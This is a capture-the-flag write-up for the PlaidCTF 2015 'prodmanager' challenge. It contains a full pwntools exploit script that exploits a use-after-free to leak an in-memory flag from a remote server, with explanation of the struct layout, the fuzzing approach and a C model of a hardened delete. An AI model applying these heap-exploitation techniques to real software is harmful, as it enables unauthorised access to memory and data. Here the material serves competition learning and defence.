@stephenR
Created April 20, 2015 20:10
plaid ctf 2015 prodmanager write up
```python
#!/usr/bin/env python
# Python 2 / pwntools exploit script for prodmanager (PlaidCTF 2015)
import pwn as p
import sys
import random

debug_enabled = len(sys.argv) > 1


def debug(s):
    if not debug_enabled:
        return
    print '[*] DEBUG: {}'.format(s)


def menu(choice):
    # wait for the menu prompt, then pick an option
    s.readuntil('(Not complete yet)\n')
    s.readuntil('Input: ')
    s.sendline(str(choice))


def create(name, price=1):
    # menu 1: create a product (name + price) in the linked list
    debug('creating item "{}"'.format(name))
    menu(1)
    s.readuntil('Enter product name: ')
    s.sendline(name)
    s.readuntil('Enter product price: ')
    s.sendline(str(price))
    s.readuntil('Success!\n')


def add(name):
    # menu 3: add a product to the product manager (the heap)
    debug('adding item "{}"'.format(name))
    menu(3)
    s.readuntil('Which product name would you like to add: ')
    s.sendline(name)
    #if 'INVALID' in s.readall():
    if "INVALID" in s.readuntil('successfully!\n'):
        print '---'*50
        print 'INPUT INVALID'
        exit(0)


def delete(name):
    # menu 2: unlink the product from the list and free it
    debug('deleting item "{}"'.format(name))
    menu(2)
    s.readuntil('Which product name would you like to remove: ')
    s.sendline(name)
    s.readuntil('Remove successful!\n')


def set_profile(d):
    # menu 5: 76-byte profile allocation, reuses the freed product chunk
    debug('setting profile')
    assert len(d) <= 74
    menu(5)
    s.readuntil('Creating profile!\n')
    s.sendline(d)
    s.readuntil('Profile created!\n')


def print3():
    # menu 4: remove the 3 cheapest products and print name and price
    menu(4)


flag = 0x0804c3e0

seed = random.randint(0, 0xffffffff)
seed = 1223085062  # the winning seed; drop this line to fuzz again
print 'seed: {}'.format(seed)
random.seed(seed)


def x():
    # create 3 products with random prices and add them to the manager
    lengths = [0x1000, 0x2000, 0x3000]
    random.shuffle(lengths)
    create('1', lengths[0])
    create('2', lengths[1])
    create('3', lengths[2])
    add('1')
    add('2')
    add('3')
    # free them in random order and refill each freed chunk via the profile
    lengths = [0x1fffffff, 0x2fffffff, 0x3fffffff]
    random.shuffle(lengths)
    names = map(str, [1, 2, 3])
    random.shuffle(names)
    delete(names[0])
    set_profile(p.p32(lengths[0]))
    delete(names[1])
    set_profile(p.p32(lengths[1]))
    delete(names[2])
    # price, four null pointers, then &flag-0x18 as the fake product pointer
    set_profile(p.p32(lengths[2])+p.p32(0)*4+p.p32(flag-0x18)+'Hi mom')
    #raw_input('gdb')
    print3()


#s = p.remote('127.0.0.1', 4667)
s = p.remote('52.5.68.190', 4667)
x()
s.clean_and_log()
```
prodmanager was a pwnable for 180 points implementing an enterprise-ready product manager that keeps track of your inventory.
On startup the flag is read from a file and stored in memory somewhere.
The menu gave you 5 options:
1) create a new product
2) delete a product
3) add an item to the product manager
4) remove the 3 cheapest products and print their names and price
5) allocate 76 bytes for the uaf^w^wa profile name
Creating a product will ask you for a name and price and store it in a linked list.
The struct looks roughly like this (the three `parent` fields are the heap pointers, as sketched by the author):
```c
struct product{
    int price;
    product *l_prev;   /* linked list */
    product *l_next;
    product *parent;   /* product manager heap pointers */
    product *parent;
    product *parent;
    char name[];
};
```
l_prev and l_next are the linked list pointers. Deleting will remove it from the linked list and free the element.
Menu choice 5 will allocate exactly the size of a product (76 bytes) and read arbitrary data into it, sounds legit.
3) and 4) insert and remove from the product manager which uses something that looks like a binary heap internally.
Creating a product, adding it to the manager and then deleting it again will result in a use after free, which we can conveniently control with menu choice 5.
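The bug class in one runnable model, as an added example (my own code, not the challenge binary's): a product lives in two structures at once, an intrusive doubly-linked list and a "manager" min-heap of pointers. The challenge's menu 2 unlinks from the list and frees the node but never touches the manager, so the heap keeps a dangling pointer and the next menu 4 walks freed memory. The names `create`, `manager_add`, `delete_unsafe`, `delete_safe` and the array-backed heap are assumptions of this example; the hardened delete refuses to free a node the manager still references.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_MANAGED 16

/* Simplified product: list links plus a fixed-size name (the real struct has more pointers). */
struct product {
    int price;
    struct product *l_prev;
    struct product *l_next;
    char name[32];
};

static struct product *list_head;              /* all created products */
static struct product *managed[MAX_MANAGED];   /* manager: min-heap of pointers by price */
static int managed_count;

/* Menu 1: allocate a product and link it into the list. */
struct product *create(const char *name, int price)
{
    struct product *p = calloc(1, sizeof *p);
    if (!p) return NULL;
    p->price = price;
    strncpy(p->name, name, sizeof p->name - 1);
    p->l_next = list_head;
    if (list_head) list_head->l_prev = p;
    list_head = p;
    return p;
}

static void swap_at(int i, int j)
{
    struct product *t = managed[i]; managed[i] = managed[j]; managed[j] = t;
}

static void sift_up(int i)
{
    while (i > 0 && managed[(i - 1) / 2]->price > managed[i]->price) {
        swap_at(i, (i - 1) / 2);
        i = (i - 1) / 2;
    }
}

static void sift_down(int i)
{
    for (;;) {
        int l = 2 * i + 1, r = l + 1, m = i;
        if (l < managed_count && managed[l]->price < managed[m]->price) m = l;
        if (r < managed_count && managed[r]->price < managed[m]->price) m = r;
        if (m == i) return;
        swap_at(i, m);
        i = m;
    }
}

/* Menu 3: the manager stores a reference to the product, not a copy. */
int manager_add(struct product *p)
{
    if (managed_count == MAX_MANAGED) return -1;
    managed[managed_count] = p;
    sift_up(managed_count++);
    return 0;
}

int manager_index_of(const struct product *p)
{
    for (int i = 0; i < managed_count; i++)
        if (managed[i] == p) return i;
    return -1;
}

/* Menu 4, one item at a time: pop the cheapest product. */
struct product *manager_pop_cheapest(void)
{
    if (managed_count == 0) return NULL;
    struct product *p = managed[0];
    managed[0] = managed[--managed_count];
    sift_down(0);
    return p;
}

/* Drop a specific product from the manager so it may later be freed. */
int manager_remove(struct product *p)
{
    int i = manager_index_of(p);
    if (i < 0) return -1;
    managed[i] = managed[--managed_count];
    if (i < managed_count) { sift_down(i); sift_up(i); }
    return 0;
}

static void unlink_and_free(struct product *p)
{
    if (p->l_prev) p->l_prev->l_next = p->l_next; else list_head = p->l_next;
    if (p->l_next) p->l_next->l_prev = p->l_prev;
    free(p);
}

/* Menu 2 as the challenge did it: the list forgets p, the manager does not.
 * managed[] now holds a dangling pointer; the next pop reads freed memory. */
void delete_unsafe(struct product *p) { unlink_and_free(p); }

/* Hardened menu 2: a product that is still managed cannot be freed. */
int delete_safe(struct product *p)
{
    if (manager_index_of(p) >= 0) return -1;
    unlink_and_free(p);
    return 0;
}

int main(void)
{
    struct product *a = create("1", 0x1000), *b = create("2", 0x2000);
    manager_add(a); manager_add(b);
    printf("delete while managed: %d\n", delete_safe(a));        /* -1 */
    manager_remove(a);
    printf("delete after remove: %d\n", delete_safe(a));         /* 0 */
    printf("cheapest left: %s\n", manager_pop_cheapest()->name); /* 2 */
    return delete_safe(b);
}
```

The fix is an ownership rule, not a bounds check: whichever structure can still reach a node decides whether it may be freed. Equivalent designs are to have delete also call `manager_remove`, or to reference-count the node; either way, no path may free memory that another container still points to.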
All we have to do is add 3 items (the minimum so that we can call 4) and overwrite one of them with a pointer that will be interpreted as a new item with the flag as its name, so it should point to &flag - 0x18 (name sits at offset 0x18 in the struct: a 4-byte price followed by five 4-byte pointers).
To do that we'd have to understand how reading from the heap works, since blindly overwriting the product will result in a crash.
Ahh, screw that, 3 items, 3 pointers.. let's just fuzz that quickly:
* create 3 items and add them to the manager
* randomly choose one of them and overwrite it with a random price, two null pointers and &flag-0x18 for the 3 heap pointers (in random order).
* goto 1
for the record, the random seed 1223085062 was the winner :)
by tsuro for Stratum^wEat sleep pwn repeat! (with help from saelo)